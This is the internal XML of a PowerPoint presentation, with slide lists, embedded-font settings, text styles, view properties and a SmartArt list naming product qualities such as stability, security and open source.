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embedTrueTypeFonts="1">
  <p:sldMasterIdLst>
    <p:sldMasterId id="2147483657" r:id="rId4"/>
  </p:sldMasterIdLst>
  <p:notesMasterIdLst>
    <p:notesMasterId r:id="rId81"/>
  </p:notesMasterIdLst>
  <p:handoutMasterIdLst>
    <p:handoutMasterId r:id="rId82"/>
  </p:handoutMasterIdLst>
  <p:sldIdLst>
    <p:sldId id="360" r:id="rId5"/>
    <p:sldId id="278" r:id="rId6"/>
    <p:sldId id="266" r:id="rId7"/>
    <p:sldId id="257" r:id="rId8"/>
    <p:sldId id="285" r:id="rId9"/>
    <p:sldId id="284" r:id="rId10"/>
    <p:sldId id="286" r:id="rId11"/>
    <p:sldId id="329" r:id="rId12"/>
    <p:sldId id="287" r:id="rId13"/>
    <p:sldId id="352" r:id="rId14"/>
    <p:sldId id="361" r:id="rId15"/>
    <p:sldId id="331" r:id="rId16"/>
    <p:sldId id="328" r:id="rId17"/>
    <p:sldId id="322" r:id="rId18"/>
    <p:sldId id="289" r:id="rId19"/>
    <p:sldId id="362" r:id="rId20"/>
    <p:sldId id="353" r:id="rId21"/>
    <p:sldId id="323" r:id="rId22"/>
    <p:sldId id="363" r:id="rId23"/>
    <p:sldId id="324" r:id="rId24"/>
    <p:sldId id="354" r:id="rId25"/>
    <p:sldId id="364" r:id="rId26"/>
    <p:sldId id="290" r:id="rId27"/>
    <p:sldId id="311" r:id="rId28"/>
    <p:sldId id="312" r:id="rId29"/>
    <p:sldId id="313" r:id="rId30"/>
    <p:sldId id="291" r:id="rId31"/>
    <p:sldId id="309" r:id="rId32"/>
    <p:sldId id="330" r:id="rId33"/>
    <p:sldId id="292" r:id="rId34"/>
    <p:sldId id="293" r:id="rId35"/>
    <p:sldId id="294" r:id="rId36"/>
    <p:sldId id="308" r:id="rId37"/>
    <p:sldId id="332" r:id="rId38"/>
    <p:sldId id="319" r:id="rId39"/>
    <p:sldId id="295" r:id="rId40"/>
    <p:sldId id="333" r:id="rId41"/>
    <p:sldId id="296" r:id="rId42"/>
    <p:sldId id="365" r:id="rId43"/>
    <p:sldId id="297" r:id="rId44"/>
    <p:sldId id="299" r:id="rId45"/>
    <p:sldId id="300" r:id="rId46"/>
    <p:sldId id="337" r:id="rId47"/>
    <p:sldId id="334" r:id="rId48"/>
    <p:sldId id="321" r:id="rId49"/>
    <p:sldId id="302" r:id="rId50"/>
    <p:sldId id="356" r:id="rId51"/>
    <p:sldId id="335" r:id="rId52"/>
    <p:sldId id="338" r:id="rId53"/>
    <p:sldId id="288" r:id="rId54"/>
    <p:sldId id="344" r:id="rId55"/>
    <p:sldId id="358" r:id="rId56"/>
    <p:sldId id="347" r:id="rId57"/>
    <p:sldId id="359" r:id="rId58"/>
    <p:sldId id="348" r:id="rId59"/>
    <p:sldId id="349" r:id="rId60"/>
    <p:sldId id="343" r:id="rId61"/>
    <p:sldId id="350" r:id="rId62"/>
    <p:sldId id="351" r:id="rId63"/>
    <p:sldId id="305" r:id="rId64"/>
    <p:sldId id="326" r:id="rId65"/>
    <p:sldId id="307" r:id="rId66"/>
    <p:sldId id="304" r:id="rId67"/>
    <p:sldId id="336" r:id="rId68"/>
    <p:sldId id="370" r:id="rId69"/>
    <p:sldId id="301" r:id="rId70"/>
    <p:sldId id="314" r:id="rId71"/>
    <p:sldId id="315" r:id="rId72"/>
    <p:sldId id="280" r:id="rId73"/>
    <p:sldId id="357" r:id="rId74"/>
    <p:sldId id="275" r:id="rId75"/>
    <p:sldId id="303" r:id="rId76"/>
    <p:sldId id="366" r:id="rId77"/>
    <p:sldId id="283" r:id="rId78"/>
    <p:sldId id="367" r:id="rId79"/>
    <p:sldId id="368" r:id="rId80"/>
  </p:sldIdLst>
  <p:sldSz cx="12192000" cy="6858000"/>
  <p:notesSz cx="7010400" cy="9296400"/>
  <p:embeddedFontLst>
    <p:embeddedFont>
      <p:font typeface="Arial Narrow" panose="020B0506020202030204" pitchFamily="34" charset="0"/>
      <p:regular r:id="rId83"/>
      <p:bold r:id="rId84"/>
      <p:italic r:id="rId85"/>
      <p:boldItalic r:id="rId86"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Courier Std" panose="02070409020205020404" charset="0"/>
      <p:regular r:id="rId87"/>
      <p:bold r:id="rId88"/>
      <p:italic r:id="rId89"/>
      <p:boldItalic r:id="rId90"/>
    </p:embeddedFont>
  </p:embeddedFontLst>
  <p:defaultTextStyle>
    <a:defPPr>
      <a:defRPr lang="en-US"/>
    </a:defPPr>
    <a:lvl1pPr algn="l" rtl="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
      <a:spcBef>
        <a:spcPct val="0"/>
      </a:spcBef>
      <a:spcAft>
        <a:spcPct val="0"/>
      </a:spcAft>
      <a:defRPr sz="2400" b="1" kern="1200">
        <a:solidFill>
          <a:srgbClr val="FFA27C"/>
        </a:solidFill>
        <a:latin typeface="Arial Narrow" pitchFamily="34" charset="0"/>
        <a:ea typeface="+mn-ea"/>
        <a:cs typeface="+mn-cs"/>
      </a:defRPr>
    </a:lvl1pPr>
    <a:lvl2pPr marL="457200" algn="l" rtl="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
      <a:spcBef>
        <a:spcPct val="0"/>
      </a:spcBef>
      <a:spcAft>
        <a:spcPct val="0"/>
      </a:spcAft>
      <a:defRPr sz="2400" b="1" kern="1200">
        <a:solidFill>
          <a:srgbClr val="FFA27C"/>
        </a:solidFill>
        <a:latin typeface="Arial Narrow" pitchFamily="34" charset="0"/>
        <a:ea typeface="+mn-ea"/>
        <a:cs typeface="+mn-cs"/>
      </a:defRPr>
    </a:lvl2pPr>
    <a:lvl3pPr marL="914400" algn="l" rtl="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
      <a:spcBef>
        <a:spcPct val="0"/>
      </a:spcBef>
      <a:spcAft>
        <a:spcPct val="0"/>
      </a:spcAft>
      <a:defRPr sz="2400" b="1" kern="1200">
        <a:solidFill>
          <a:srgbClr val="FFA27C"/>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rgbClr val="FFA27C"/>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rgbClr val="FFA27C"/>
        </a:solidFill>
        <a:latin typeface="Arial Narrow" pitchFamily="34" charset="0"/>
        <a:ea typeface="+mn-ea"/>
        <a:cs typeface="+mn-cs"/>
      </a:defRPr>
    </a:lvl5pPr>
    <a:lvl6pPr marL="2286000" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
      <a:defRPr sz="2400" b="1" kern="1200">
        <a:solidFill>
          <a:srgbClr val="FFA27C"/>
        </a:solidFill>
        <a:latin typeface="Arial Narrow" pitchFamily="34" charset="0"/>
        <a:ea typeface="+mn-ea"/>
        <a:cs typeface="+mn-cs"/>
      </a:defRPr>
    </a:lvl6pPr>
    <a:lvl7pPr marL="2743200" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
      <a:defRPr sz="2400" b="1" kern="1200">
        <a:solidFill>
          <a:srgbClr val="FFA27C"/>
        </a:solidFill>
        <a:latin typeface="Arial Narrow" pitchFamily="34" charset="0"/>
        <a:ea typeface="+mn-ea"/>
        <a:cs typeface="+mn-cs"/>
      </a:defRPr>
    </a:lvl7pPr>
    <a:lvl8pPr marL="3200400" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
      <a:defRPr sz="2400" b="1" kern="1200">
        <a:solidFill>
          <a:srgbClr val="FFA27C"/>
        </a:solidFill>
        <a:latin typeface="Arial Narrow" pitchFamily="34" charset="0"/>
        <a:ea typeface="+mn-ea"/>
        <a:cs typeface="+mn-cs"/>
      </a:defRPr>
    </a:lvl8pPr>
    <a:lvl9pPr marL="3657600" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
      <a:defRPr sz="2400" b="1" kern="1200">
        <a:solidFill>
          <a:srgbClr val="FFA27C"/>
        </a:solidFill>
        <a:latin typeface="Arial Narrow" pitchFamily="34" charset="0"/>
        <a:ea typeface="+mn-ea"/>
        <a:cs typeface="+mn-cs"/>
      </a:defRPr>
    </a:lvl9pPr>
  </p:defaultTextStyle>
  <p:extLst>
    <p:ext uri="{EFAFB233-063F-42B5-8137-9DF3F51BA10A}">
      <p15:sldGuideLst xmlns:p15="http://schemas.microsoft.com/office/powerpoint/2012/main">
        <p15:guide id="1" orient="horz" pos="1080" userDrawn="1">
          <p15:clr>
            <a:srgbClr val="A4A3A4"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="2" pos="408" userDrawn="1">
          <p15:clr>
            <a:srgbClr val="A4A3A4"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="3" pos="3840" userDrawn="1">
          <p15:clr>
            <a:srgbClr val="A4A3A4"/>
          </p15:clr>
        </p15:guide>
      </p15:sldGuideLst>
    </p:ext>
    <p:ext uri="{2D200454-40CA-4A62-9FC3-DE9A4176ACB9}">
      <p15:notesGuideLst xmlns:p15="http://schemas.microsoft.com/office/powerpoint/2012/main">
        <p15:guide id="1" orient="horz" pos="5397" userDrawn="1">
          <p15:clr>
            <a:srgbClr val="A4A3A4"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="2" pos="2208" userDrawn="1">
          <p15:clr>
            <a:srgbClr val="A4A3A4"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="3" pos="414" userDrawn="1">
          <p15:clr>
            <a:srgbClr val="A4A3A4"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="4" orient="horz" pos="192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DALL, NATHANIEL D Capt USAF ACC 32 WPS/DOU" initials="KNDCUA3W" lastIdx="1" clrIdx="0">
    <p:extLst>
      <p:ext uri="{19B8F6BF-5375-455C-9EA6-DF929625EA0E}">
        <p15:presenceInfo xmlns:p15="http://schemas.microsoft.com/office/powerpoint/2012/main" userId="S-1-5-21-1271409858-1095883707-2794662393-15492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0EFF"/>
    <a:srgbClr val="00A47E"/>
    <a:srgbClr val="00EAB2"/>
    <a:srgbClr val="00776D"/>
    <a:srgbClr val="00DED9"/>
    <a:srgbClr val="04FFFC"/>
    <a:srgbClr val="009900"/>
    <a:srgbClr val="FFFF00"/>
    <a:srgbClr val="FFA27C"/>
    <a:srgbClr val="FF9B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01" autoAdjust="0"/>
    <p:restoredTop sz="87520" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr snapToGrid="0" showGuides="1">
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="100" d="100"/>
          <a:sy n="100" d="100"/>
        </p:scale>
        <p:origin x="834" y="84"/>
      </p:cViewPr>
      <p:guideLst>
        <p:guide orient="horz" pos="1080"/>
        <p:guide pos="408"/>
        <p:guide pos="3840"/>
      </p:guideLst>
    </p:cSldViewPr>
  </p:slideViewPr>
  <p:outlineViewPr>
    <p:cViewPr>
      <p:scale>
        <a:sx n="33" d="100"/>
        <a:sy n="33" d="100"/>
      </p:scale>
      <p:origin x="0" y="-49164"/>
    </p:cViewPr>
  </p:outlin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6" d="100"/>
          <a:sy n="86" d="100"/>
        </p:scale>
        <p:origin x="3744" y="90"/>
      </p:cViewPr>
      <p:guideLst>
        <p:guide orient="horz" pos="5397"/>
        <p:guide pos="2208"/>
        <p:guide pos="414"/>
        <p:guide orient="horz" pos="192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font" Target="fonts/font2.fntdata"/><Relationship Id="rId89" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/font7.fntdata"/><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font" Target="fonts/font5.fntdata"/><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handoutMaster" Target="handoutMasters/handoutMaster1.xml"/><Relationship Id="rId90" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/font8.fntdata"/><Relationship Id="rId95"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font" Target="fonts/font3.fntdata"/><Relationship Id="rId93"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font" Target="fonts/font1.fntdata"/><Relationship Id="rId88" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/font6.fntdata"/><Relationship Id="rId9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notesMaster" Target="notesMasters/notesMaster1.xml"/><Relationship Id="rId86" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/font4.fntdata"/><Relationship Id="rId9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D7B6B7-0033-4193-86AF-79B0CEAF4CDF}" type="doc">
      <dgm:prSet loTypeId="urn:microsoft.com/office/officeart/2008/layout/VerticalCurvedList" loCatId="list" qsTypeId="urn:microsoft.com/office/officeart/2005/8/quickstyle/3d3" qsCatId="3D" csTypeId="urn:microsoft.com/office/officeart/2005/8/colors/colorful2" csCatId="colorful" phldr="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{CB3A5AA9-ECB7-49B4-BCFC-186F675F110A}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
            <a:t>High stability</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" b="1" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{77757943-7B45-4271-969A-78657A3C57D8}" type="parTrans" cxnId="{2D1E90DD-62CD-4BA9-856D-BFF0559A07AD}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US" b="1"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{2E853EDC-E85F-494D-8A30-9A4EEEEF37C2}" type="sibTrans" cxnId="{2D1E90DD-62CD-4BA9-856D-BFF0559A07AD}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US" b="1"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{69642567-153E-47BE-8031-4632E07C179A}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
            <a:t>Security</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" b="1" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{C1F5E7E6-4F7F-44DC-A071-C3E900CA60F0}" type="parTrans" cxnId="{1A2E1FBB-F102-4CAE-9DBC-37DCF705E10A}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US" b="1"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{AE28AE42-E96F-4727-8210-22850A3C7CD3}" type="sibTrans" cxnId="{1A2E1FBB-F102-4CAE-9DBC-37DCF705E10A}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US" b="1"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{549E31C8-44E3-4268-9DC2-C7F2BB8BC29C}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
            <a:t>Easy to operate</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" b="1" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{10A899AF-3984-47D3-A91A-8E4E2CD04F89}" type="parTrans" cxnId="{6C40B739-30A7-4C9D-8C11-1BE23DCDA2F5}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US" b="1"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{5031B405-0F5A-406A-B6E1-15FA343B7D0E}" type="sibTrans" cxnId="{6C40B739-30A7-4C9D-8C11-1BE23DCDA2F5}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US" b="1"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{9E591E3B-7652-46E4-AACB-1751DD36668A}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
            <a:t>Hardware compatibility</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" b="1" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{A96116DF-4AAC-469B-B9C5-F84E36ACF0BC}" type="parTrans" cxnId="{069AE432-8920-4C10-940C-260B1B00472F}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US" b="1"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{6D5EE5F5-544C-4C61-9EAF-E06519D29190}" type="sibTrans" cxnId="{069AE432-8920-4C10-940C-260B1B00472F}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US" b="1"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{2D0B27F6-D3C4-4CC7-A10E-B26155E37AE3}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
            <a:t>Open source</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" b="1" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{ACDB6755-F333-4CC1-B3CB-9EA8D806907C}" type="parTrans" cxnId="{EC365F84-C0BC-460F-B6D7-65EDB4B23702}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US" b="1"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{F25F5222-9E06-46D0-815B-39B73103FB0C}" type="sibTrans" cxnId="{EC365F84-C0BC-460F-B6D7-65EDB4B23702}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US" b="1"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{F9CC8C24-7210-468D-AFED-82EE2FDADBD6}" type="pres">
      <dgm:prSet presAssocID="{6BD7B6B7-0033-4193-86AF-79B0CEAF4CDF}" presName="Name0" presStyleCnt="0">
        <dgm:presLayoutVars>
          <dgm:chMax val="7"/>
          <dgm:chPref val="7"/>
          <dgm:dir/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{18C36D35-84F4-4D40-B1EE-9F60AD4D0055}" type="pres">
      <dgm:prSet presAssocID="{6BD7B6B7-0033-4193-86AF-79B0CEAF4CDF}" presName="Name1" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{5ED8E1F3-AEDC-4593-AB7C-2F03C86A5EB0}" type="pres">
      <dgm:prSet presAssocID="{6BD7B6B7-0033-4193-86AF-79B0CEAF4CDF}" presName="cycle" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{533A9185-8313-437B-B63C-0BABF5B0E51A}" type="pres">
      <dgm:prSet presAssocID="{6BD7B6B7-0033-4193-86AF-79B0CEAF4CDF}" presName="srcNode" presStyleLbl="node1" presStyleIdx="0" presStyleCnt="5"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{CE1730C6-131A-4E6F-99A3-D7387A5B31A1}" type="pres">
      <dgm:prSet presAssocID="{6BD7B6B7-0033-4193-86AF-79B0CEAF4CDF}" presName="conn" presStyleLbl="parChTrans1D2" presStyleIdx="0" presStyleCnt="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{998804C4-457C-4BF0-AB5B-1AAB473B5389}" type="pres">
      <dgm:prSet presAssocID="{6BD7B6B7-0033-4193-86AF-79B0CEAF4CDF}" presName="extraNode" presStyleLbl="node1" presStyleIdx="0" presStyleCnt="5"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{B6E6BC6F-58DC-44E4-8DED-4D7BDE1C8285}" type="pres">
      <dgm:prSet presAssocID="{6BD7B6B7-0033-4193-86AF-79B0CEAF4CDF}" presName="dstNode" presStyleLbl="node1" presStyleIdx="0" presStyleCnt="5"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{D274FCCB-3661-4454-A385-F3E910488318}" type="pres">
      <dgm:prSet presAssocID="{CB3A5AA9-ECB7-49B4-BCFC-186F675F110A}" presName="text_1" presStyleLbl="node1" presStyleIdx="0" presStyleCnt="5">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{3B10B240-72C0-46A0-8DC7-E3D9FA2A35FE}" type="pres">
      <dgm:prSet presAssocID="{CB3A5AA9-ECB7-49B4-BCFC-186F675F110A}" presName="accent_1" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{DA988CAA-6DA2-412A-BF2F-8E552896EDEF}" type="pres">
      <dgm:prSet presAssocID="{CB3A5AA9-ECB7-49B4-BCFC-186F675F110A}" presName="accentRepeatNode" presStyleLbl="solidFgAcc1" presStyleIdx="0" presStyleCnt="5"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{CD5C2E3D-D136-45A1-9BB8-C562D2F85A02}" type="pres">
      <dgm:prSet presAssocID="{69642567-153E-47BE-8031-4632E07C179A}" presName="text_2" presStyleLbl="node1" presStyleIdx="1" presStyleCnt="5">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{92026A5E-D3C4-4E5D-9293-FBA7F9FEF553}" type="pres">
      <dgm:prSet presAssocID="{69642567-153E-47BE-8031-4632E07C179A}" presName="accent_2" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{02E9B703-E621-426B-A16B-9564D83FA74D}" type="pres">
      <dgm:prSet presAssocID="{69642567-153E-47BE-8031-4632E07C179A}" presName="accentRepeatNode" presStyleLbl="solidFgAcc1" presStyleIdx="1" presStyleCnt="5"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{80348DF5-9B2D-4259-A361-5CFE9012B00D}" type="pres">
      <dgm:prSet presAssocID="{549E31C8-44E3-4268-9DC2-C7F2BB8BC29C}" presName="text_3" presStyleLbl="node1" presStyleIdx="2" presStyleCnt="5">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{88C6423C-F3AD-4437-A339-3780ECF699A3}" type="pres">
      <dgm:prSet presAssocID="{549E31C8-44E3-4268-9DC2-C7F2BB8BC29C}" presName="accent_3" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{ACA340E8-39E5-43BD-843D-8C3A891EC869}" type="pres">
      <dgm:prSet presAssocID="{549E31C8-44E3-4268-9DC2-C7F2BB8BC29C}" presName="accentRepeatNode" presStyleLbl="solidFgAcc1" presStyleIdx="2" presStyleCnt="5"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{78060922-DBD4-4596-95BE-0171A098DBB0}" type="pres">
      <dgm:prSet presAssocID="{9E591E3B-7652-46E4-AACB-1751DD36668A}" presName="text_4" presStyleLbl="node1" presStyleIdx="3" presStyleCnt="5">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{629B6E61-1C0E-46A7-934D-ACB2FDE2737D}" type="pres">
      <dgm:prSet presAssocID="{9E591E3B-7652-46E4-AACB-1751DD36668A}" presName="accent_4" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{67EC25D0-D03C-468F-90FC-4972AA00968A}" type="pres">
      <dgm:prSet presAssocID="{9E591E3B-7652-46E4-AACB-1751DD36668A}" presName="accentRepeatNode" presStyleLbl="solidFgAcc1" presStyleIdx="3" presStyleCnt="5"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{24C6BFAB-DB7E-451D-ACD9-C8EBCA2E38DE}" type="pres">
      <dgm:prSet presAssocID="{2D0B27F6-D3C4-4CC7-A10E-B26155E37AE3}" presName="text_5" presStyleLbl="node1" presStyleIdx="4" presStyleCnt="5">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{21F6FDCC-E516-403A-BE63-6FA3B19004C4}" type="pres">
      <dgm:prSet presAssocID="{2D0B27F6-D3C4-4CC7-A10E-B26155E37AE3}" presName="accent_5" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{2CE816EE-6817-49F9-8CAC-6DAFCE20A2F4}" type="pres">
      <dgm:prSet presAssocID="{2D0B27F6-D3C4-4CC7-A10E-B26155E37AE3}" presName="accentRepeatNode" presStyleLbl="solidFgAcc1" presStyleIdx="4" presStyleCnt="5"/>
      <dgm:spPr/>
    </dgm:pt>
  </dgm:ptLst>
  <dgm:cxnLst>
    <dgm:cxn modelId="{93115B2F-514E-4F26-BAFE-FF5D679CEAD0}" type="presOf" srcId="{CB3A5AA9-ECB7-49B4-BCFC-186F675F110A}" destId="{D274FCCB-3661-4454-A385-F3E910488318}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/VerticalCurvedList"/>
    <dgm:cxn modelId="{110BF2C3-FCF8-4758-B401-22E499959CFB}" type="presOf" srcId="{9E591E3B-7652-46E4-AACB-1751DD36668A}" destId="{78060922-DBD4-4596-95BE-0171A098DBB0}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/VerticalCurvedList"/>
    <dgm:cxn modelId="{F20150A5-80C4-46E3-A07C-E6CCA118EA97}" type="presOf" srcId="{6BD7B6B7-0033-4193-86AF-79B0CEAF4CDF}" destId="{F9CC8C24-7210-468D-AFED-82EE2FDADBD6}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/VerticalCurvedList"/>
    <dgm:cxn modelId="{1A2E1FBB-F102-4CAE-9DBC-37DCF705E10A}" srcId="{6BD7B6B7-0033-4193-86AF-79B0CEAF4CDF}" destId="{69642567-153E-47BE-8031-4632E07C179A}" srcOrd="1" destOrd="0" parTransId="{C1F5E7E6-4F7F-44DC-A071-C3E900CA60F0}" sibTransId="{AE28AE42-E96F-4727-8210-22850A3C7CD3}"/>
    <dgm:cxn modelId="{9716737C-E549-48F0-BCFC-B6487BF1B87E}" type="presOf" srcId="{2E853EDC-E85F-494D-8A30-9A4EEEEF37C2}" destId="{CE1730C6-131A-4E6F-99A3-D7387A5B31A1}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/VerticalCurvedList"/>
    <dgm:cxn modelId="{6C40B739-30A7-4C9D-8C11-1BE23DCDA2F5}" srcId="{6BD7B6B7-0033-4193-86AF-79B0CEAF4CDF}" destId="{549E31C8-44E3-4268-9DC2-C7F2BB8BC29C}" srcOrd="2" destOrd="0" parTransId="{10A899AF-3984-47D3-A91A-8E4E2CD04F89}" sibTransId="{5031B405-0F5A-406A-B6E1-15FA343B7D0E}"/>
